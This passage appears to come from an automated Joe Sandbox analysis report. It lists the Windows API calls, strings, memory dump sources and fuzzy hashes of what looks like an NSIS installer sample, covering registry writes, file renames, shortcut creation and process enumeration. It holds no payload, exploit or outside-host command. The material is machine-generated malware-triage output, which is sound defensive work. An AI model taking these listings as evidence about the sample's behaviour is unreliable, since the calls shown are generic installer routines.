                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406902
                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                          • String ID: F$A
                                                                                          • API String ID: 3347642858-1281894373
                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                          • API String ID: 1916479912-1189179171
                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                          APIs
                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406902
                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406A73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                          • API String ID: 3581403547-1792361021
                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                          Strings
                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                          • API String ID: 542301482-1377821865
                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                          • API String ID: 20674999-2124804629
                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                          APIs
                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                          • String ID: F$N$open
                                                                                          • API String ID: 3928313111-1104729357
                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                          APIs
                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                          • API String ID: 565278875-3368763019
                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                          • String ID: F
                                                                                          • API String ID: 941294808-1304234792
                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                          APIs
                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          Strings
                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
